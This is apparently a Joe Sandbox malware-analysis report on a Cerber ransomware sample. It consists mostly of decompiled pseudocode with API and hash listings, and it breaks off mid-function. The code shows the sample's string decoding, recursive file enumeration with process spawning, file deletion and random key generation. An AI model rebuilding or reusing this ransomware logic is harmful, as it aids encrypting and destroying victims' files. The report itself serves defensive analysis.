                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                        			E00401000(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				char* _t40;
                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                        				char* _t50;
                                                                                                                                                                                        				char* _t51;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                        				char* _t59;
                                                                                                                                                                                        				int _t61;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                        
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t59 = __ecx;
                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 0x28)) = 0;
                                                                                                                                                                                        				 *(_t62 - 4) = 0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 0x1c)) =  *0x40f19c(__ecx, 0x40da98, 0x68);
                                                                                                                                                                                        				 *(_t62 - 0x24) = __ecx;
                                                                                                                                                                                        				_t40 = E00405905(0x40cea8, 4, 0x9946767a);
                                                                                                                                                                                        				_t64 = _t63 + 0xc;
                                                                                                                                                                                        				 *(_t62 - 0x30) = _t40;
                                                                                                                                                                                        				 *(_t62 - 0x20) =  *(_t62 + 8);
                                                                                                                                                                                        				while( *((intOrPtr*)(_t62 - 0x1c)) != 0) {
                                                                                                                                                                                        					if( *_t59 != 0x2d) {
                                                                                                                                                                                        						L5:
                                                                                                                                                                                        						 *(_t62 - 0x78) = 0;
                                                                                                                                                                                        						memset(_t62 - 0x77, 0, 0x40);
                                                                                                                                                                                        						_t64 = _t64 + 0xc;
                                                                                                                                                                                        						_t61 = 0;
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							 *(_t62 - 0x34) = _t61;
                                                                                                                                                                                        							if( *((intOrPtr*)(_t62 - 0x1c)) == 0 || _t61 >= 0x40) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t53 = StrSpnA(_t59,  *(_t62 - 0x30));
                                                                                                                                                                                        							_t59 =  &(_t59[_t53]);
                                                                                                                                                                                        							 *(_t62 - 0x24) = _t59;
                                                                                                                                                                                        							_t18 = _t62 - 0x1c;
                                                                                                                                                                                        							 *_t18 =  *((intOrPtr*)(_t62 - 0x1c)) - _t53;
                                                                                                                                                                                        							if( *_t18 == 0) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							 *((char*)(_t62 + _t61 - 0x78)) =  *_t59;
                                                                                                                                                                                        							_t61 = _t61 + 1;
                                                                                                                                                                                        							_t59 =  &(_t59[1]);
                                                                                                                                                                                        							 *(_t62 - 0x24) = _t59;
                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t61 == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *(_t62 - 0x2c) = _t61;
                                                                                                                                                                                        						if(CryptStringToBinaryA(_t62 - 0x78, _t61, 1,  *(_t62 - 0x20), _t62 - 0x2c, 0, 0) == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t49 =  *(_t62 - 0x2c);
                                                                                                                                                                                        						 *((intOrPtr*)(_t62 - 0x28)) =  *((intOrPtr*)(_t62 - 0x28)) + _t49;
                                                                                                                                                                                        						if( *(_t62 - 0x20) != 0) {
                                                                                                                                                                                        							 *(_t62 - 0x20) =  &(( *(_t62 - 0x20))[_t49]);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t50 = E00405905(0x40ceb0, 2, 0x1d2258b8);
                                                                                                                                                                                        					_t64 = _t64 + 0xc;
                                                                                                                                                                                        					_t51 = StrPBrkA(_t59, _t50);
                                                                                                                                                                                        					if(_t51 == 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t52 = _t51 - _t59;
                                                                                                                                                                                        					_t59 =  &(_t59[_t52]);
                                                                                                                                                                                        					 *(_t62 - 0x24) = _t59;
                                                                                                                                                                                        					 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - _t52;
                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
                                                                                                                                                                                        				return E0040B68F( *((intOrPtr*)(_t62 - 0x28)));
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlen.KERNEL32(?,0040DA98,00000068,00401114,00000000,0040113B,00000000,00000000,00000000,0040279F,00000000,00000000,004029D6,0042F7C8,0040D17C,80C426C8), ref: 00401017
                                                                                                                                                                                        • StrPBrkA.SHLWAPI(?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00401064
                                                                                                                                                                                        • memset.NTDLL ref: 00401086
                                                                                                                                                                                        • StrSpnA.SHLWAPI(?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 004010A1
                                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004010D8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BinaryCryptStringlstrlenmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3810766292-0
                                                                                                                                                                                        • Opcode ID: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
                                                                                                                                                                                        • Instruction ID: c7d5595ef341d99572007a40d8366c5632a506f8eb375d6286f033b694829096
                                                                                                                                                                                        • Opcode Fuzzy Hash: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
                                                                                                                                                                                        • Instruction Fuzzy Hash: C9314BB1C00259AFDF209FF98884AEEBBB4AF48350F14453BF651B6291D33849808F69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E00401423(void* __edx, intOrPtr _a4, WCHAR* _a8) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				struct _WIN32_FIND_DATAW _v612;
                                                                                                                                                                                        				short _v1132;
                                                                                                                                                                                        				char _v1652;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				short* _t29;
                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                        				WCHAR* _t38;
                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                        				void* _t60;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				void* _t65;
                                                                                                                                                                                        				void* _t69;
                                                                                                                                                                                        				WCHAR* _t70;
                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t69 = __edx;
                                                                                                                                                                                        				_t70 = _a8;
                                                                                                                                                                                        				_t3 = lstrlenW(_t70) * 2; // 0x401634
                                                                                                                                                                                        				_t29 = _t70 + _t3 - 2;
                                                                                                                                                                                        				if( *_t29 == 0x5c) {
                                                                                                                                                                                        					 *_t29 = 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t32 = E00406390(0x40cec8,  &_v1132, _t70);
                                                                                                                                                                                        				_pop(_t65);
                                                                                                                                                                                        				if(_t32 == 0) {
                                                                                                                                                                                        					L14:
                                                                                                                                                                                        					return _t32;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t32 = FindFirstFileW( &_v1132,  &_v612);
                                                                                                                                                                                        				_t63 = _t32;
                                                                                                                                                                                        				if(_t63 == 0xffffffff) {
                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					L4:
                                                                                                                                                                                        					if(E004063BC( &(_v612.cFileName)) == 0) {
                                                                                                                                                                                        						if((_v612.dwFileAttributes & 0x00000010) == 0) {
                                                                                                                                                                                        							_t38 = E0040591C(0x40cecc, 5, 0x25f360d5);
                                                                                                                                                                                        							_t73 = _t73 + 0xc;
                                                                                                                                                                                        							__eflags = PathMatchSpecW( &(_v612.cFileName), _t38);
                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                        								_push( &(_v612.cFileName));
                                                                                                                                                                                        								_push(_t70);
                                                                                                                                                                                        								_push(E0040591C(0x40ced4, 5, 0x7f642c43));
                                                                                                                                                                                        								_push( &_a8);
                                                                                                                                                                                        								_t44 = E00405B0C(_t63, _t65, _t70, _t71, __eflags);
                                                                                                                                                                                        								_t73 = _t73 + 0x1c;
                                                                                                                                                                                        								__eflags = _t44;
                                                                                                                                                                                        								if(_t44 != 0) {
                                                                                                                                                                                        									_push( &(_v612.cFileName));
                                                                                                                                                                                        									_push(E0040591C(0x40cedc, 0xd, 0x674a9bfe));
                                                                                                                                                                                        									_push(_a4);
                                                                                                                                                                                        									E00402B9B(_t63, _t69, _t70, _t71);
                                                                                                                                                                                        									_push( &_v20);
                                                                                                                                                                                        									_t49 = 0xb;
                                                                                                                                                                                        									E00405DFA(_t49, _t65, _t69);
                                                                                                                                                                                        									_pop(_t65);
                                                                                                                                                                                        									_push(_a8);
                                                                                                                                                                                        									_push( &_v20);
                                                                                                                                                                                        									_push(E00405905(0x40ceec, 0x3d, 0xa229e8b6));
                                                                                                                                                                                        									_push( &_v8);
                                                                                                                                                                                        									_t54 = E00405B59(_t63, _t65, _t70, _t71, __eflags);
                                                                                                                                                                                        									_t73 = _t73 + 0x34;
                                                                                                                                                                                        									__eflags = _t54;
                                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                                        										E0040137F(_t63, _t65, _t70, __eflags, _v8);
                                                                                                                                                                                        										_pop(_t65);
                                                                                                                                                                                        										E00405463(_v8);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t71 = _a8;
                                                                                                                                                                                        									E00405463(_a8);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t60 = E00406390( &(_v612.cFileName),  &_v1652, _t70);
                                                                                                                                                                                        							_pop(_t65);
                                                                                                                                                                                        							if(_t60 != 0) {
                                                                                                                                                                                        								E00401423(_t69, _a4,  &_v1652);
                                                                                                                                                                                        								_pop(_t65);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t32 = FindNextFileW(_t63,  &_v612);
                                                                                                                                                                                        				} while (_t32 != 0);
                                                                                                                                                                                        				goto L14;
                                                                                                                                                                                        			}

                                                                                                                                                                                        0x004014ad
                                                                                                                                                                                        0x004014b3
                                                                                                                                                                                        0x004014b6
                                                                                                                                                                                        0x004014c6
                                                                                                                                                                                        0x004014cc
                                                                                                                                                                                        0x004014cc
                                                                                                                                                                                        0x004014b6
                                                                                                                                                                                        0x0040149d
                                                                                                                                                                                        0x004015a8
                                                                                                                                                                                        0x004015ae
                                                                                                                                                                                        0x00000000

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlenW.KERNEL32(00401636,0040183A,00000000,00000000), ref: 00401433
                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00401472
                                                                                                                                                                                        • PathMatchSpecW.SHLWAPI(?,00000000), ref: 004014EE
                                                                                                                                                                                          • Part of subcall function 0040137F: memset.NTDLL ref: 004013B8
                                                                                                                                                                                          • Part of subcall function 0040137F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004013DD
                                                                                                                                                                                          • Part of subcall function 0040137F: WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,00000000), ref: 004013EF
                                                                                                                                                                                          • Part of subcall function 0040137F: TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00401400
                                                                                                                                                                                          • Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401409
                                                                                                                                                                                          • Part of subcall function 0040137F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401412
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 004015A8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseErrorFileFindHandleLastProcess$CreateFirstFreeHeapMatchNextObjectPathSingleSpecTerminateWaitlstrlenmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3597093630-0
                                                                                                                                                                                        • Opcode ID: d7ed3821c4ff18cd28c083edc5959936dab08209629d2a171b7723aff3e264d4
                                                                                                                                                                                        • Instruction ID: 3cbd6c154ce3158a442487cf6f0ac316fb6bcfd1db9ef5865afd0173552f36fe
                                                                                                                                                                                        • Opcode Fuzzy Hash: d7ed3821c4ff18cd28c083edc5959936dab08209629d2a171b7723aff3e264d4
                                                                                                                                                                                        • Instruction Fuzzy Hash: 3D418372800119BADB20AB61DC46FAB336CEF40314F5405BBF905F61D1F739AB448AA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SearchPathW.KERNEL32(00000000,00404E95,00000000,00000208,?,00000000,00000000), ref: 00404E02
                                                                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 00404E19
                                                                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 00404E44
                                                                                                                                                                                        • RtlFreeAnsiString.NTDLL(?), ref: 00404E53
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Path$AnsiDeleteFileFreeNameName_SearchString
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2886153233-0
                                                                                                                                                                                        • Opcode ID: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
                                                                                                                                                                                        • Instruction ID: 971f7049e0bf6f074288626a8879415b8312df22cfafa15f3008a757f98ac60a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2401ECF690020CAFEB11EFA5CD85EDFB7BCBB04304F40457AA615F2151DB399A488BA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 28%
                                                                                                                                                                                        			E00404B6E(BYTE* __edi, char _a4) {
                                                                                                                                                                                        				intOrPtr _v4;
                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                        				BYTE* _t8;
                                                                                                                                                                                        				long* _t9;
                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t8 = __edi;
                                                                                                                                                                                        				_t9 = 0;
                                                                                                                                                                                        				_t10 =  *0x42f804 - _t9; // 0x0
                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                        					_push(0xf0000040);
                                                                                                                                                                                        					_push(1);
                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                        					_push(0x42f804);
                                                                                                                                                                                        					if( *0x40fa58() == 0) {
                                                                                                                                                                                        						 *0x42f804 = 0;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t1 =  &_a4; // 0x404464
                                                                                                                                                                                        				_t5 = CryptGenRandom( *0x42f804,  *_t1, _t8);
                                                                                                                                                                                        				if(_t5 != 0 || _v4 <= _t9) {
                                                                                                                                                                                        					L6:
                                                                                                                                                                                        					return _t5;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t5 = E004063E1(0xff);
                                                                                                                                                                                        						 *(_t9 + _t8) = _t5;
                                                                                                                                                                                        						_t9 = _t9 + 1;
                                                                                                                                                                                        					} while (_t9 < _v4);
                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(0042F804,00000000,00000000,00000001,F0000040,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007), ref: 00404B87
                                                                                                                                                                                        • CryptGenRandom.ADVAPI32(dD@ ,80C426C8,00000020,00404464,00000020,00000000,?,80C426C8,00000000,?,80C426C8,-00000006,-00000007,?,0040B4AF,00000000), ref: 00404BA2
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$AcquireContextRandom
                                                                                                                                                                                        • String ID: dD@
                                                                                                                                                                                        • API String ID: 2163786899-696579481
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                        			E00401EB2(signed int __ecx, intOrPtr* _a4) {
                                                                                                                                                                                        				short _v524;
                                                                                                                                                                                        				char _v532;
                                                                                                                                                                                        				void _v1554;
                                                                                                                                                                                        				short _v1556;
                                                                                                                                                                                        				char _v1564;
                                                                                                                                                                                        				void* _v1660;
                                                                                                                                                                                        				char _v1668;
                                                                                                                                                                                        				short _v1700;
                                                                                                                                                                                        				char _v1708;
                                                                                                                                                                                        				short _v1740;
                                                                                                                                                                                        				char _v1748;
                                                                                                                                                                                        				struct _SYSTEMTIME _v1756;
                                                                                                                                                                                        				struct _FILETIME _v1764;
                                                                                                                                                                                        				struct _FILETIME _v1772;
                                                                                                                                                                                        				intOrPtr _v1776;
                                                                                                                                                                                        				WCHAR* _v1784;
                                                                                                                                                                                        				longlong _v1788;
                                                                                                                                                                                        				long _v1792;
                                                                                                                                                                                        				intOrPtr* _v1796;
                                                                                                                                                                                        				WCHAR* _v1800;
                                                                                                                                                                                        				intOrPtr _v1804;
                                                                                                                                                                                        				WCHAR* _v1808;
                                                                                                                                                                                        				intOrPtr _v1816;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				intOrPtr* _t111;
                                                                                                                                                                                        				WCHAR* _t112;
                                                                                                                                                                                        				longlong _t113;
                                                                                                                                                                                        				short _t116;
                                                                                                                                                                                        				int _t123;
                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                        				void* _t131;
                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                        				void* _t140;
                                                                                                                                                                                        				signed int _t167;
                                                                                                                                                                                        				WCHAR* _t177;
                                                                                                                                                                                        				WCHAR* _t180;
                                                                                                                                                                                        				WCHAR* _t183;
                                                                                                                                                                                        				WCHAR* _t186;
                                                                                                                                                                                        				WCHAR* _t189;
                                                                                                                                                                                        				WCHAR* _t192;
                                                                                                                                                                                        				WCHAR* _t195;
                                                                                                                                                                                        				WCHAR* _t198;
                                                                                                                                                                                        				WCHAR* _t201;
                                                                                                                                                                                        				WCHAR* _t204;
                                                                                                                                                                                        				WCHAR* _t207;
                                                                                                                                                                                        				WCHAR* _t210;
                                                                                                                                                                                        				WCHAR* _t213;
                                                                                                                                                                                        				WCHAR* _t216;
                                                                                                                                                                                        				WCHAR* _t219;
                                                                                                                                                                                        				intOrPtr* _t226;
                                                                                                                                                                                        				long _t229;
                                                                                                                                                                                        				WCHAR* _t232;
                                                                                                                                                                                        				signed int _t243;
                                                                                                                                                                                        				long _t244;
                                                                                                                                                                                        				void* _t246;
                                                                                                                                                                                        				void* _t252;
                                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                                        				void* _t257;
                                                                                                                                                                                        				void* _t259;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t230 = __ecx;
                                                                                                                                                                                        				_t257 = (_t255 & 0xfffffff8) - 0x704;
                                                                                                                                                                                        				_v1792 = GetCurrentThreadId();
                                                                                                                                                                                        				_t111 = E004053BD(_t230);
                                                                                                                                                                                        				_t226 = _t111;
                                                                                                                                                                                        				_v1796 = _t226;
                                                                                                                                                                                        				if(_t226 == 0) {
                                                                                                                                                                                        					L53:
                                                                                                                                                                                        					return _t111;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t112 = E004053BD(_t230);
                                                                                                                                                                                        				_v1784 = _t112;
                                                                                                                                                                                        				if(_t112 == 0) {
                                                                                                                                                                                        					L52:
                                                                                                                                                                                        					_t111 = E00405463(_t226);
                                                                                                                                                                                        					goto L53;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t113 = E004053BD(_t230);
                                                                                                                                                                                        				_v1788 = _t113;
                                                                                                                                                                                        				if(_t113 == 0) {
                                                                                                                                                                                        					L51:
                                                                                                                                                                                        					E00405463(_v1784);
                                                                                                                                                                                        					goto L52;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *((short*)(_t226 + 4)) = 0;
                                                                                                                                                                                        				_t116 =  *0x42f7a4; // 0x0
                                                                                                                                                                                        				 *_t226 = 0x52627246;
                                                                                                                                                                                        				 *((short*)(_t226 + 0x15)) = _t116;
                                                                                                                                                                                        				while(WaitForSingleObject( *0x42f834, 0xf) != 0) {
                                                                                                                                                                                        					_t242 = _a4;
                                                                                                                                                                                        					_t252 = E00401E83(_a4);
                                                                                                                                                                                        					__eflags = _t252;
                                                                                                                                                                                        					if(_t252 == 0) {
                                                                                                                                                                                        						L50:
                                                                                                                                                                                        						E00405463(_v1788);
                                                                                                                                                                                        						_t226 = _v1796;
                                                                                                                                                                                        						goto L51;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t232 = E00409439(_t252, _t230,  &_v1772);
                                                                                                                                                                                        					_v1800 = _t232;
                                                                                                                                                                                        					__eflags = _t232;
                                                                                                                                                                                        					if(_t232 == 0) {
                                                                                                                                                                                        						E00405463(_t252);
                                                                                                                                                                                        						goto L50;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t123 = _v1772.dwLowDateTime;
                                                                                                                                                                                        					_t235 =  &(_t232[_t123]);
                                                                                                                                                                                        					_v1772.dwHighDateTime =  &(_t232[_t123]);
                                                                                                                                                                                        					StrCpyNW( &_v524, _t232, _t123);
                                                                                                                                                                                        					_t229 =  *(_t252 + 8);
                                                                                                                                                                                        					_t127 = E00402C54( &(_t232[_t123]),  *_t242);
                                                                                                                                                                                        					_pop(0);
                                                                                                                                                                                        					__eflags = _t127;
                                                                                                                                                                                        					if(_t127 == 0) {
                                                                                                                                                                                        						_t243 = 0x2000;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_v1788 = _v1788 & 0x00000000;
                                                                                                                                                                                        						asm("stosd");
                                                                                                                                                                                        						_t246 = CreateFileW(_v1808, 0x80000000, 1, 0, 3, 0, 0);
                                                                                                                                                                                        						__eflags = _t246 - 0xffffffff;
                                                                                                                                                                                        						if(_t246 != 0xffffffff) {
                                                                                                                                                                                        							 *0x40f214(_t246,  &_v1788);
                                                                                                                                                                                        							CloseHandle(_t246);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v1772.dwHighDateTime =  *(_t252 + 0x14);
                                                                                                                                                                                        						_v1772.dwLowDateTime =  *(_t252 + 0x10);
                                                                                                                                                                                        						FileTimeToLocalFileTime( &_v1772,  &_v1764);
                                                                                                                                                                                        						FileTimeToSystemTime( &_v1764,  &_v1756);
                                                                                                                                                                                        						GetDateFormatW(0x400, 1,  &_v1756, 0,  &_v1700, 0x14);
                                                                                                                                                                                        						GetTimeFormatW(0x400, 8,  &_v1756, 0,  &_v1740, 0x14);
                                                                                                                                                                                        						_v1556 = 0;
                                                                                                                                                                                        						memset( &_v1554, 0, 0x3fe);
                                                                                                                                                                                        						_t259 = _t257 + 0xc;
                                                                                                                                                                                        						__eflags = _t229 & 0x00000001;
                                                                                                                                                                                        						if((_t229 & 0x00000001) != 0) {
                                                                                                                                                                                        							_t219 = E0040591C(0x40d070, 2, 0x68262057);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t219);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000002;
                                                                                                                                                                                        						if((_t229 & 0x00000002) != 0) {
                                                                                                                                                                                        							_t216 = E0040591C(0x40d074, 2, 0xe737ec15);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t216);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000004;
                                                                                                                                                                                        						if((_t229 & 0x00000004) != 0) {
                                                                                                                                                                                        							_t213 = E0040591C(0x40d078, 2, 0x90281ace);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t213);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000010;
                                                                                                                                                                                        						if((_t229 & 0x00000010) != 0) {
                                                                                                                                                                                        							_t210 = E0040591C(0x40d07c, 2, 0x4ff7714d);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t210);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000020;
                                                                                                                                                                                        						if((_t229 & 0x00000020) != 0) {
                                                                                                                                                                                        							_t207 = E0040591C(0x40d080, 2, 0x41cc7f90);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t207);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000040;
                                                                                                                                                                                        						if((_t229 & 0x00000040) != 0) {
                                                                                                                                                                                        							_t204 = E0040591C(0x40d084, 4, 0x1b2fac60);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t204);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229;
                                                                                                                                                                                        						if(_t229 < 0) {
                                                                                                                                                                                        							_t201 = E0040591C(0x40d08c, 2, 0xc8c3223a);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
                                                                                                                                                                                        							StrCatW( &_v1556, _t201);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						__eflags = _t229 & 0x00000100;
                                                                                                                                                                                        						if((_t229 & 0x00000100) != 0) {
                                                                                                                                                                                        							_t198 = E0040591C(0x40d090, 2, 0xb487359d);
                                                                                                                                                                                        							_t259 = _t259 + 0xc;
